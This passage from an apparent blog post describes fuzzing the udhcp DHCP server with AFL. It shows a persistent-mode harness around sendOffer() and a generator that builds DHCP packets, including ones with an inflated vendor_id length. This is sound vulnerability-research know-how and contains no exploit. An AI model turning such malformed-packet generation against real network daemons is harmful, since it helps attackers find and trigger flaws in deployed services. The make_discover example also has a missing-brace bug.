• The DHCP message type is then read from the fuzz_packet struct and saved to state . If no valid message type is found we continue to next testcase; otherwise the original switch block from the server code is entered with a single case to match DHCPDISCOVER messages.
• The fuzz data in fuzz_packet is passed to sendOffer()

The final code within the fuzzing loop is shown below:

int main(int argc, char *argv[])
{	

  [... SNIP ...]

	// START AFL LOOP
		__AFL_INIT();

		unsigned char *aflbuf = __AFL_FUZZ_TESTCASE_BUF; // afl will automatically read the file data into this buf
	
		while (__AFL_LOOP(10000000)) {
			// reset leases at the start of each run
			memset(leases, 0, sizeof(struct dhcpOfferedAddr) * server_config.max_leases);
			read_leases(server_config.lease_file);
			
			// check len is good
			ssize_t afllen = __AFL_FUZZ_TESTCASE_LEN;
			if (afllen > sizeof(struct dhcpMessage)) continue;
	
			struct dhcpMessage fuzz_packet;
			memset(&fuzz_packet, 0, sizeof(struct dhcpMessage));
			memcpy(&fuzz_packet, aflbuf, sizeof(struct dhcpMessage));
	
			if ((state = get_option(&fuzz_packet, DHCP_MESSAGE_TYPE)) == NULL) {
				continue;
			}

			lease = find_lease_by_chaddr(fuzz_packet.chaddr);
			
			// Pass the testcase data to the target functions based on message type
			switch (state[0]) {
				case DHCPDISCOVER:
					if (sendOffer(&fuzz_packet) < 0) {
						printf("send OFFER failed");
					}
					break;
			default:
				continue;
		}
	}
	return 0;
}

Generating Testcases

Next, I had to figure out a way to generate testcases and write them out to files to make them readable by AFL, since this is how it’s designed to read inputs. To accomplish this I used the DHCP client code included with udhcp to generate valid dhcpMessage structures and write the raw bytes out to disk.

Creating Packets

The majority of the client components are located in dhcpc.c and clientpacket.c. Upon reviewing the code, I found that dhcpMessage objects are initialized with the function init_packet(); this function is called by other higher-level functions used to create specific types of DHCP messages (send_discover(), send_renew(), etc). Below is an example of one of these functions, used to send DHCP Discover messages:

/* Broadcast a DHCP discover packet to the network, with an optionally requested IP */
int send_discover(unsigned long xid, unsigned long requested)
{
	struct dhcpMessage packet;

	init_packet(&packet, DHCPDISCOVER);
	packet.xid = xid;
	if (requested)
		add_simple_option(packet.options, DHCP_REQUESTED_IP, requested);

	add_requests(&packet);
	LOG(LOG_DEBUG, "Sending discover...");
	return raw_packet(&packet, INADDR_ANY, CLIENT_PORT, INADDR_BROADCAST, 
				SERVER_PORT, MAC_BCAST_ADDR, client_config.ifindex);
}

This actually made things incredibly easy — all I had to do was make modified copies of these higher-level functions that I could use to generate mutated packets and write them to files. I made a new file in the source directory for the testcase generator and copied over the relevant code from dhcpc.c and clientpacket.c . I won’t post the code for every modified function to keep things readable but below is an example of the modified version of the send_discover() function showed in the code block above.

/* Broadcast a DHCP discover packet to the network, with an optionally requested IP */
static void make_discover(struct dhcpMessage *packet, unsigned long xid, unsigned long requested)
{
	printf("debug - discover start\n");
	init_packet_fuzz(packet, DHCPDISCOVER);
	packet->xid = xid;
	if (requested)
		printf("requested ip\n");
		add_simple_option(packet->options, DHCP_REQUESTED_IP, requested);

	add_requests_fz(packet);
	printf("debug - add_req finished\n");

	// EDIT: Removed code the sends the packet over the network
  // return raw_packet(&packet, INADDR_ANY, CLIENT_PORT, INADDR_BROADCAST, 
	//			SERVER_PORT, MAC_BCAST_ADDR, client_config.ifindex);
}

For each of these functions, I removed the calls to raw_packet() that were present in the originals; this function takes care of adding TCP/UDP headers to the packet and actually sending the packet over the network. Apart from the fact that we don’t actually need to send any packets since we intend to write the out to files, we also don’t need to to add TCP/UDP headers since the target function sendOffer() expects to receive a parsed dhcpMessage struct which has already been read from the socket and stripped of the encapsulating layer. Instead, each of these functions just returns after initializing the packet arg (this is passed by reference, so the calling function has the pointer to packet).

Additionally, I also created a couple of customized versions of the init_packet() function that would allow me to easily pass in custom values for fields I might want to focus on. For example, I created a version that would allow me to pass in a custom length value for the vendor_id that’s added to the packet using add_option_string() :

static void init_packet_long_vendor_str(struct dhcpMessage *packet, char type, unsigned int fuzz_length)
{
	struct vendor  {
		char vendor, length;
		char str[sizeof("udhcp")];
	} vendor_id = { DHCP_VENDOR,  (sizeof("A") * fuzz_length) - 1, "udhcp"};
	
	init_header(packet, type);
	memcpy(packet->chaddr, client_config.arp, 6);
	add_option_string(packet->options, client_config.clientid);
	if (client_config.hostname) add_option_string(packet->options, client_config.hostname);
	add_option_string(packet->options, (unsigned char *) &vendor_id);
}